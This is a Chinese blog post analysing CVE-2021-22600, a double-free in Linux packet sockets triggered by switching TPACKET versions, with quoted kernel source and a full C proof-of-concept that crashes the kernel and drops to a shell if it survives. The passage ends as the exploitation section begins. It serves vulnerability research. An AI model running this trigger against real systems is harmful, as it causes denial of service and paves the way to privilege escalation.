【CVE.0x0D】CVE-2021-22600 漏洞分析及利用

本文最后更新于:2025年5月6日 凌晨

少上网多读书

0x00. 一切开始之前

CVE-2021-22600 是一个发生在 Linux kernel 的网络子系统中的 Packet Socket 当中的 检查缺乏导致的类型混淆与释放后使用 漏洞,得益于在 Packet Socket 对完成 setsocktop() 操作中的 PACKET_VERSION 切换 socket 版本后的状态的检查不严格,以及对同一内核对象的双重记录,攻击者可以使内核将一个 TPACKET_v3 所用的对象在释放之后仍能被误用为 TPACKET_v2 所用类型,从而通过该漏洞 完成对特定内核对象的双重释放 ,最终攻击内核以完成本地提权

该漏洞的 CVSS 分数为 7.8 ,影响版本包括但不限于 4.14.175~4.14.2584.19.114~1.19.2215.4.29~5.4.1675.5.14~5.10.875.11~5.15.11,本文我们选用 5.11.16 版本的内核源码进行分析

Packet Socket

Packet Socket 是 Linux 当中的一种用于在设备驱动层(OSI 模型自底向上第 2 层)接收 raw packets 的 sockets,从而使得开发者可以通过用户态程序在物理层上实现上层的协议解析模块(当然,这也就需要用户必须具备 CAP_NET_RAW 权限):

在创建 Packet Socket 时,我们应当指定 domainAF_PACKET

1
packet_socket = socket(AF_PACKET, int socket_type, int protocol);

对于 socket type,我们有两种可选项:

  • SOCK_RAW:这为我们提供原始的 raw packet
  • SOCK_DGRAM :这为我们提供去掉了 Physical Header 的 packet

更多的使用方法我们就不深入介绍了,这里我们来看 Packet Socket 的内核实现,首先在模块初始化函数中注册了 PF_PACKET 这一 family:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
static const struct net_proto_family packet_family_ops = {
.family = PF_PACKET,
.create = packet_create,
.owner = THIS_MODULE,
};

static int __init packet_init(void)
{
//...
rc = sock_register(&packet_family_ops);

在创建 Socket 时有如下调用栈:

1
2
3
4
__x64_sys_socket()
__sys_socket()
sock_create()
__sock_create()

__sock_create() 中会调用到 net_proto_family::create()

/net/socket.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;

//...

rcu_read_lock();
pf = rcu_dereference(net_families[family]);
//...

err = pf->create(net, sock, protocol, kern);

因此会调用到 packet_family_ops::create ,即 packet_create

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
/*
* Create a packet of type SOCK_PACKET.
*/

static int packet_create(struct net *net, struct socket *sock, int protocol,
int kern)
{
struct sock *sk;
struct packet_sock *po;
__be16 proto = (__force __be16)protocol; /* weird, but documented */
int err;

if (!ns_capable(net->user_ns, CAP_NET_RAW))
return -EPERM;
if (sock->type != SOCK_DGRAM && sock->type != SOCK_RAW &&
sock->type != SOCK_PACKET)
return -ESOCKTNOSUPPORT;

sock->state = SS_UNCONNECTED;

err = -ENOBUFS;
sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern);
if (sk == NULL)
goto out;

sock->ops = &packet_ops;
if (sock->type == SOCK_PACKET)
sock->ops = &packet_ops_spkt;

sock_init_data(sock, sk);

po = pkt_sk(sk);
init_completion(&po->skb_completion);
sk->sk_family = PF_PACKET;
po->num = proto;
po->xmit = dev_queue_xmit;

err = packet_alloc_pending(po);
if (err)
goto out2;

packet_cached_dev_reset(po);

sk->sk_destruct = packet_sock_destruct;
sk_refcnt_debug_inc(sk);

/*
* Attach a protocol block
*/

spin_lock_init(&po->bind_lock);
mutex_init(&po->pg_vec_lock);
po->rollover = NULL;
po->prot_hook.func = packet_rcv;

if (sock->type == SOCK_PACKET)
po->prot_hook.func = packet_rcv_spkt;

po->prot_hook.af_packet_priv = sk;

if (proto) {
po->prot_hook.type = proto;
__register_prot_hook(sk);
}

mutex_lock(&net->packet.sklist_lock);
sk_add_node_tail_rcu(sk, &net->packet.sklist);
mutex_unlock(&net->packet.sklist_lock);

preempt_disable();
sock_prot_inuse_add(net, &packet_proto, 1);
preempt_enable();

return 0;
out2:
sk_free(sk);
out:
return err;
}

这里我们注意到 packet socket 的操作函数表被初始化为 packet_ops

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static const struct proto_ops packet_ops = {
.family = PF_PACKET,
.owner = THIS_MODULE,
.release = packet_release,
.bind = packet_bind,
.connect = sock_no_connect,
.socketpair = sock_no_socketpair,
.accept = sock_no_accept,
.getname = packet_getname,
.poll = packet_poll,
.ioctl = packet_ioctl,
.gettstamp = sock_gettstamp,
.listen = sock_no_listen,
.shutdown = sock_no_shutdown,
.setsockopt = packet_setsockopt,
.getsockopt = packet_getsockopt,
.sendmsg = packet_sendmsg,
.recvmsg = packet_recvmsg,
.mmap = packet_mmap,
.sendpage = sock_no_sendpage,
};

setsockopt for Packet Socket

和其他类型的 socket 一样,packet socket 也为我们提供了 setsockopt 函数以进行各种高级功能,其内部实现和绝大多数 setsockopt 一样是个巨大的 switch:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {

我们这里主要关注与我们的漏洞有关的几个子功能

PACKET_VERSION:版本变更

Packet Socket 存在三个不同的版本:V1、V2、V3 ,而 setsockoptPACKET_VERSION 子功能让我们可以实时变更 Packet Socket 的版本:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
case PACKET_VERSION:
{
int val;

if (optlen != sizeof(val))
return -EINVAL;
if (copy_from_sockptr(&val, optval, sizeof(val)))
return -EFAULT;
switch (val) {
case TPACKET_V1:
case TPACKET_V2:
case TPACKET_V3:
break;
default:
return -EINVAL;
}
lock_sock(sk);
if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) {
ret = -EBUSY;
} else {
po->tp_version = val;
ret = 0;
}
release_sock(sk);
return ret;
}

PACKET_RX_RING || PACKET_TX_RING:创建环形缓冲区

这两个子功能主要用于为数据包的收发创建高速的环形缓冲区, 用户可以将内核中的环形缓冲区映射到用户地址空间,从而实现快速的数据包收发功能 ,也就是我们常说的 zero copy ,这减少了系统调用的状态切换与数据拷贝开销:

  • 对于发送( TX )而言,应用程序直接将数据包写入映射到用户空间的缓冲区,之后内核便能直接读取缓冲区中的待发送数据包
  • 对于接受(RX)而言,内核直接将数据包写入映射到用户空间的缓冲区,之后在用户空间便能直接读取缓冲区中的已接收数据包

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}

环形缓冲区的核心结构是 pgv 结构体,本质上是一个指针,在实际使用时会被创建为 指针数组

/net/packet/internal.h

1
2
3
struct pgv {
char *buffer;
};

在看环形缓冲区之前,我们先来看用户应当提交的请求的格式,版本 V1、V2 和 V3 使用的是不同的格式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
struct tpacket_req {
unsigned int tp_block_size; /* 最小连续块的大小 */
unsigned int tp_block_nr; /* 块的数量 */
unsigned int tp_frame_size; /* 帧的大小 */
unsigned int tp_frame_nr; /* 帧的数量 */
};

struct tpacket_req3 {
unsigned int tp_block_size; /* 最小连续块的大小 */
unsigned int tp_block_nr; /* 块的数量 */
unsigned int tp_frame_size; /* 帧的大小 */
unsigned int tp_frame_nr; /* 帧的数量 */
unsigned int tp_retire_blk_tov; /* timeout in msecs */
unsigned int tp_sizeof_priv; /* offset to private data area */
unsigned int tp_feature_req_word;
};

union tpacket_req_u {
struct tpacket_req req;
struct tpacket_req3 req3;
};

下面是笔者以 V1 为例写的一个简单的 用户态请求环形缓冲区 的例子,环形缓冲区的总大小为 tp_block_size * tp_block_nr ,块大小 tp_block_size 便是 pgv 结构体数组中单个 entry 的大小,块数量自然是 pgv 数组成员数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

现在我们来验证这个大小,环形缓冲区的创建通过 packet_set_ring() 完成,根据 Packet Socket 版本的不同在操作上会存在一些细微的差别,一些私有数据会被存放在 packet_socket 这一结构体当中,以及对于 TX ring 和 RX ring而言在其中使用了两个不同的 packet_ring_buffer 结构体存放数据:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

对于块数量不为 0 的情况,首先会进行一系列检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
if (req->tp_block_nr) {
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

之后分配 pgv 结构体,这里我们可以看到使用的是 alloc_pg_vec() 函数进行分配,首先分配成员数量为 tp_block_nrpgv 结构体数组,接下来进行 tp_block_nr 次的为每个数组成员调用页级内存分配 API 从 buddy allocator 分配内存(失败则调用 vzalloc() 分配),将 page 在 direct mapped area 上对应的地址存放到 pgv 结构体当中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* __get_free_pages failed, fall back to vmalloc */
buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
if (buffer)
return buffer;

/* vmalloc failed, lets dig into swap here */
gfp_flags &= ~__GFP_NORETRY;
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* complete and utter failure */
return NULL;
}

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}


static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
//...
if (req->tp_block_nr) {
//...
err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);

不难得到 pgv 结构体长这个样子:

之后根据 packet version 以及 ring 的类别( TXRX )进行不同处理:

  • 对于 TPACKET_V3 而言,如果不是 tx_ring ,则调用 init_prb_bdqc() 进行初始化
  • 对于其他 version,如果不是 tx_ring ,则调用 bitmap_alloc() 分配一个位图
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
	if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) {
init_prb_bdqc(po, rb, pg_vec, req_u);
} else {
struct tpacket_req3 *req3 = &req_u->req3;

if (req3->tp_retire_blk_tov ||
req3->tp_sizeof_priv ||
req3->tp_feature_req_word) {
err = -EINVAL;
goto out_free_pg_vec;
}
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}

如果 tp_block_nr 是 0 而 tp_frame_nr 非 0 的话则直接跳到出口返回,否则仍会继续走下面的路径 :

1
2
3
4
5
6
/* Done */
else {
err = -EINVAL;
if (unlikely(req->tp_frame_nr))
goto out;
}

完成对 pgv 的分配之后,接下来存放到 socket 结构体内部,替换掉旧的 pgv ,如果是 V2 及之前的版本还要替换掉旧的 rx_owner_map ,这里我们也注意到 当 tp_block_nr 和 tp_frame_nr 都是 0 的情况下则不会进行分配,而是会进行清理的工作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/* Detach socket from network */
spin_lock(&po->bind_lock);
was_running = po->running;
num = po->num;
if (was_running) {
po->num = 0;
__unregister_prot_hook(sk, false);
}
spin_unlock(&po->bind_lock);

synchronize_net();

err = -EBUSY;
mutex_lock(&po->pg_vec_lock);
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map);
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
mutex_unlock(&po->pg_vec_lock);

这里我们会注意到有存在一个字段复用的情况,对于 V1 和 V2 而言会使用 packet_ring_buffer::rx_owner_map 存放 rx_owner_map ,对于 V3 而言会在 init_prb_bdqc() 中额外使用 packet_ring_buffer::prb_bdqc::pkbdq 存放 pgv ,这两个字段在结构体中的物理位置相同:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
struct tpacket_kbdq_core {
struct pgv *pkbdq;
//...
}

struct packet_ring_buffer {
struct pgv *pg_vec;

//...

union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec;

回到 packet_set_ring() ,最后就是收尾工作,将替换出来的旧的 pgvrx_owner_map 进行释放:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
	spin_lock(&po->bind_lock);
if (was_running) {
po->num = num;
register_prot_hook(sk);
}
spin_unlock(&po->bind_lock);
if (pg_vec && (po->tp_version > TPACKET_V2)) {
/* Because we don't support block-based V3 on tx-ring */
if (!tx_ring)
prb_shutdown_retire_blk_timer(po, rb_queue);
}

out_free_pg_vec:
bitmap_free(rx_owner_map);
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr);
out:
return err;
}

mmap for Packet Socket

现在我们来看如何在用户态使用 pgv 缓冲区进行数据交换,在我们通过 setsockopt() 创建并分配 pgv 缓冲区之后,我们可以直接通过 mmap() 将缓冲区映射到用户态,在我们创建 mmap 区域时内核便会直接建立 pgv 缓冲区在用户空间的映射,省略了传统的通过缺页中断插入页面的过程的页面访问开销:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}

需要注意的是在 vm_insert_page() 中会对页面类型进行检查,需要满足以下条件:

  • 不是匿名页(阻止我们映射进程中不与文件关联的页面,例如堆和栈)
  • 不是 Slab 页面(阻止我们映射已经分配给 slab 子系统的内核普通堆对象)
  • 不是有类型的页面(阻止我们映射内核中用于特殊目的的物理页,如 ZRAM 页面)

不过从 buddy system 直接分配的空闲页面正常情况下都满足这些要求

/mm/memory.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}

static int insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page, pgprot_t prot)
{
struct mm_struct *mm = vma->vm_mm;
int retval;
pte_t *pte;
spinlock_t *ptl;

retval = validate_page_before_insert(page);
if (retval)
goto out;
retval = -ENOMEM;
pte = get_locked_pte(mm, addr, &ptl);
if (!pte)
goto out;
retval = insert_page_into_pte_locked(mm, pte, addr, page, prot);
pte_unmap_unlock(pte, ptl);
out:
return retval;
}

int vm_insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page)
{
if (addr < vma->vm_start || addr >= vma->vm_end)
return -EFAULT;
if (!page_count(page))
return -EINVAL;
if (!(vma->vm_flags & VM_MIXEDMAP)) {
BUG_ON(mmap_read_trylock(vma->vm_mm));
BUG_ON(vma->vm_flags & VM_PFNMAP);
vma->vm_flags |= VM_MIXEDMAP;
}
return insert_page(vma, addr, page, vma->vm_page_prot);
}
EXPORT_SYMBOL(vm_insert_page);

0x01. 漏洞分析

虽然版本的随意切换给 Packet Socket 带来了非常高的灵活性,但也带来了不小的风险

Root Cause

注意到 V1 和 V2 使用的 packet_ring_buffer::rx_owner_map 和 V3 使用的 packet_ring_buffer::prb_bdqc 共享同一联合体字段,且存放 rx_owner_mappacket_ring_buffer::rx_owner_map 和存放 pgvpacket_ring_buffer::prb_bdqc::pkbdq 位于结构体中的同一偏移,而 packet socket 的版本切换并没有限制 ,那么便会存在如下情况:

  • 首先在 V3 下用 setsockopt 创建一个 RX ring buffer ,此时 pgv 被同时存在 RX ring 的 packet_ring_buffer::pg_vecpacket_ring_buffer::prb_bdqc::pkbdq
  • 接下来用 setsockopt 释放掉 packet_ring_buffer::pg_vec ,此时 packet_ring_buffer::prb_bdqc::pkbdq依旧保留着对旧的 pgv 的记录
  • 接下来用 setsockopt 切换到 V2,再用 setsockopt 创建一个 RX ring buffer此时在 packet_ring_buffer::prb_bdqc::pkbdq 中仍存有的旧的 pgv 记录 便会被当作 packet_ring_buffer::rx_owner_map 给释放掉 ,而 packet_ring_buffer::pg_vec 本身也会被释放掉,因此这个内核对象 便会被释放两次

由此我们便有了一个 double free 的漏洞

说实话笔者觉得这 b 洞纯粹是省空间省魔怔了硬要上联合体导致的,你要说 page 这种数量巨大且用途特别多的结构体为了压缩空间搞各种复合联合体那👴4️⃣认可的,tm 的一个 packet_ring_buffer 又不会被大量分配, 真有必要省这 8 个字节?

Proof-Of-Concept

这里笔者给出自己写的 POC,主要就是直接用 Double Free 造成 kernel crash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/socket.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERR_MSG(msg))

void err_exit(char *msg)
{
printf(ERR_MSG("[x] Error at: ") "%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

void print_banner(void)
{
puts(SUCCESS_MSG("-------- CVE-2021-22600 Proof-of-concet --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESS_MSG("-----------------------------------------------\n"));
}

struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
unsigned int tp_retire_blk_tov;
unsigned int tp_sizeof_priv;
unsigned int tp_feature_req_word;
};

enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

#define PACKET_RX_RING 5
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

void proof_of_concept(void)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

print_banner();

log_info("[*] Prepare env...");

bind_core(0);

unshare_setup();

log_info("[*] Creating packet socket...");

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
err_exit("FAILED to create socket");
}

log_info("[*] Creating V3 RX ring buffer...");

version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V3");
}

memset(&req, 0, sizeof(req));
req.tp_block_size = 0x1000;
req.tp_block_nr = 1;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to allocate RX ring buffer");
}

log_info("[*] Freeing pgv...");

req.tp_block_size = 0x3361626e;
req.tp_block_nr = 0;
req.tp_frame_size = 0x74747261;
req.tp_frame_nr = 0;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to free RX ring buffer");
}

log_info("[*] Switing to V2 socket...");

version = TPACKET_V2;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V2");
}

log_info("[*] Freeing V2 rx_owner_map to trigger direct double free...");

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to setsockopt");
}

puts("[?] You are still alive!?");
system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
proof_of_concept();
return 0;
}

成功通过 kfree 的 double free 检测造成 kernel crash:

0x02. 漏洞利用

下面我们来看如何利用这个漏洞,得益于 pgv 结构体的大小是可变且可控的,且分配自通用的 GFP_KERNEL ,因此我们有很多种利用方式

